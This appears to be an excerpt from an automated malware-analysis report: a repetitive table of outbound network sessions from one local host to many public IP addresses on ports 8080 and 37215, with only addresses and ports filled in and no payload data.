                                                        36514192.168.2.2351600218.247.96.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36515192.168.2.2348954122.205.154.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36516192.168.2.233342470.144.149.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36517192.168.2.2345790152.60.100.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36518192.168.2.2339042139.152.185.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36519192.168.2.2337778180.220.69.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36520192.168.2.235363687.102.86.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36521192.168.2.235277087.250.13.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36522192.168.2.2338680212.76.63.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36523192.168.2.2348128178.209.101.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36524192.168.2.2355282138.125.88.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36525192.168.2.2347552164.251.55.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36526192.168.2.235605675.141.13.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36527192.168.2.23607469.6.197.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36528192.168.2.234756459.110.226.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36529192.168.2.2349118163.110.226.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36530192.168.2.2340318187.150.98.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36531192.168.2.2348432188.176.47.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36532192.168.2.236034891.139.129.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36533192.168.2.2346742189.155.245.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36534192.168.2.2357022189.229.163.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36535192.168.2.235711417.217.206.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36536192.168.2.235199090.51.120.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36537192.168.2.234772076.27.203.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36538192.168.2.2360228195.97.166.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36539192.168.2.2337800131.220.234.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36540192.168.2.2360792210.145.113.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36541192.168.2.2334652202.83.58.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36542192.168.2.2349984117.223.125.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36543192.168.2.2359634176.119.121.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36544192.168.2.2333584199.40.211.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36545192.168.2.2340942206.244.165.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36546192.168.2.2334716112.45.69.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36547192.168.2.236056080.25.235.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36548192.168.2.234350660.180.13.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36549192.168.2.2354850197.189.67.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36550192.168.2.2336014203.125.206.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36551192.168.2.236047217.145.213.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36552192.168.2.2352606167.43.147.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36553192.168.2.233473639.134.50.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36554192.168.2.2358984115.160.5.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36555192.168.2.234448639.131.6.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36556192.168.2.2357592180.184.57.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36557192.168.2.2347902112.94.127.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36558192.168.2.2347916173.120.186.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36559192.168.2.233658079.234.82.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36560192.168.2.23585045.83.103.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36561192.168.2.2342906170.184.85.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36562192.168.2.2347060213.65.13.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36563192.168.2.2347374141.190.105.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36564192.168.2.234461048.66.95.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36565192.168.2.2358438197.57.251.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36566192.168.2.2341364113.119.237.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36567192.168.2.235735641.68.232.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36568192.168.2.235168841.140.26.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36569192.168.2.2338246197.92.142.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36570192.168.2.2358334197.85.214.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36571192.168.2.235464041.107.16.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36572192.168.2.235325241.106.89.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36573192.168.2.235632041.102.190.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36574192.168.2.235932041.231.27.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36575192.168.2.235992241.85.184.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36576192.168.2.2352402157.178.10.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36577192.168.2.234671425.226.169.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36578192.168.2.234288441.76.84.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36579192.168.2.2356508197.43.50.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36580192.168.2.2337656197.205.77.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36581192.168.2.2356496197.232.243.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36582192.168.2.233429841.228.83.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36583192.168.2.2347258197.55.109.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36584192.168.2.2339180157.141.174.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36585192.168.2.233386045.24.206.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36586192.168.2.2340978197.14.18.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36587192.168.2.2347468197.59.157.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36588192.168.2.235806867.97.152.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36589192.168.2.2347272157.95.20.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36590192.168.2.2334948197.224.153.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36591192.168.2.2347628157.79.86.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36592192.168.2.234066850.47.0.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36593192.168.2.234070841.67.209.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36594192.168.2.236070641.228.96.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36595192.168.2.235787041.145.97.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36596192.168.2.233862241.6.38.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36597192.168.2.2343668197.186.121.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36598192.168.2.2342784197.182.49.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36599192.168.2.2346552197.45.116.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36600192.168.2.233876841.169.57.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36601192.168.2.2337894157.117.118.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36602192.168.2.2334956157.106.56.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36603192.168.2.234925041.11.11.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36604192.168.2.2354918157.140.21.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36605192.168.2.2341928147.56.13.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36606192.168.2.233970441.155.148.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36607192.168.2.2334800157.150.252.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36608192.168.2.234046041.35.22.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36609192.168.2.235129641.5.188.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36610192.168.2.2333140157.192.112.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36611192.168.2.235186041.110.223.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36612192.168.2.23335061.185.191.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36613192.168.2.2356702197.251.80.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36614192.168.2.2334568157.80.247.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36615192.168.2.233984641.199.190.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36616192.168.2.234312641.69.12.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36617192.168.2.235587441.195.7.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36618192.168.2.2358352157.78.32.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36619192.168.2.2337610194.161.170.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36620192.168.2.233671241.209.191.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36621192.168.2.2347858197.231.237.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36622192.168.2.2342790197.9.10.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36623192.168.2.2360282197.91.117.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36624192.168.2.2334514157.180.162.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36625192.168.2.234567841.53.62.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36626192.168.2.233951241.148.206.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36627192.168.2.2337552122.192.23.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36628192.168.2.2344232157.237.254.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36629192.168.2.2333596157.225.72.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36630192.168.2.235626064.91.26.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36631192.168.2.234028641.140.164.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36632192.168.2.2355822197.11.241.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36633192.168.2.2338030157.64.27.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36634192.168.2.235332641.40.94.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36635192.168.2.235566041.236.225.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36636192.168.2.235024041.115.21.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36637192.168.2.2343664197.246.1.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36638192.168.2.234367441.253.199.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36639192.168.2.2341060157.125.22.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36640192.168.2.2333190157.43.21.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36641192.168.2.2336570197.16.244.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36642192.168.2.234606841.103.162.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36643192.168.2.2344104160.30.78.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36644192.168.2.2352814157.163.44.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36645192.168.2.2342574170.209.161.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36646192.168.2.2350824157.65.104.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36647192.168.2.233860441.174.66.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36648192.168.2.2351374157.176.40.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36649192.168.2.2338620196.19.158.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36650192.168.2.2360588153.66.233.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36651192.168.2.2333190197.176.87.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36652192.168.2.235676841.15.77.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36653192.168.2.235221696.84.202.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36654192.168.2.2350634157.118.108.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36655192.168.2.2338214157.51.185.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36656192.168.2.235030071.154.121.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36657192.168.2.2342442157.18.61.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36658192.168.2.2333914157.98.242.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36659192.168.2.236087641.50.72.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36660192.168.2.2341054197.201.168.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36661192.168.2.2357472196.70.95.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36662192.168.2.2349058197.51.182.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36663192.168.2.2350338197.49.41.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36664192.168.2.2337224157.33.129.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36665192.168.2.2338114197.131.186.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36666192.168.2.2345610157.227.131.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36667192.168.2.233990841.78.220.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36668192.168.2.235487641.255.50.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36669192.168.2.2338760109.10.216.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36670192.168.2.235827041.234.12.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36671192.168.2.234409041.133.170.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36672192.168.2.2335518197.41.38.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36673192.168.2.233918241.64.115.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36674192.168.2.2338750197.167.61.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36675192.168.2.233332841.235.34.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36676192.168.2.2337008197.153.210.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36677192.168.2.2337760131.59.255.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36678192.168.2.233347041.3.99.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36679192.168.2.2350818107.196.7.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36680192.168.2.2335724157.176.23.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36681192.168.2.234675041.63.35.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36682192.168.2.233843064.116.61.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36683192.168.2.235434451.164.166.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36684192.168.2.2348400157.35.79.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36685192.168.2.233645883.146.211.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36686192.168.2.234926441.117.251.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36687192.168.2.235202241.80.17.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36688192.168.2.234326241.97.158.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36689192.168.2.234191241.114.5.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36690192.168.2.2357120197.126.208.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36691192.168.2.234703041.143.189.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36692192.168.2.233493041.46.154.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36693192.168.2.235127446.221.160.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36694192.168.2.2338392157.50.168.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36695192.168.2.2343276197.70.227.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36696192.168.2.2349106155.20.163.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36697192.168.2.234175441.226.67.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36698192.168.2.2352890136.84.132.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36699192.168.2.2353036197.128.69.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36700192.168.2.235091432.168.156.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36701192.168.2.234152241.205.59.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36702192.168.2.234867241.100.210.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36703192.168.2.2359854108.233.52.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36704192.168.2.235489041.168.165.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36705192.168.2.2339254197.68.29.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36706192.168.2.234307841.234.149.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36707192.168.2.2358318197.209.1.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36708192.168.2.234238434.132.101.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36709192.168.2.2333994197.81.154.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36710192.168.2.2334076163.47.75.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36711192.168.2.235585041.227.203.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36712192.168.2.233699041.26.187.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36713192.168.2.2353146157.177.154.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36714192.168.2.2342020122.119.117.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36715192.168.2.2349358132.15.208.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36716192.168.2.2335290167.5.193.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36717192.168.2.235663499.183.36.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36718192.168.2.2356660135.12.158.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36719192.168.2.2338034200.3.153.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36720192.168.2.2333568119.46.248.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36721192.168.2.236092884.61.167.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36722192.168.2.2333644219.120.254.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36723192.168.2.2358378114.111.104.2048080
                                                        TimestampBytes transferredDirectionData


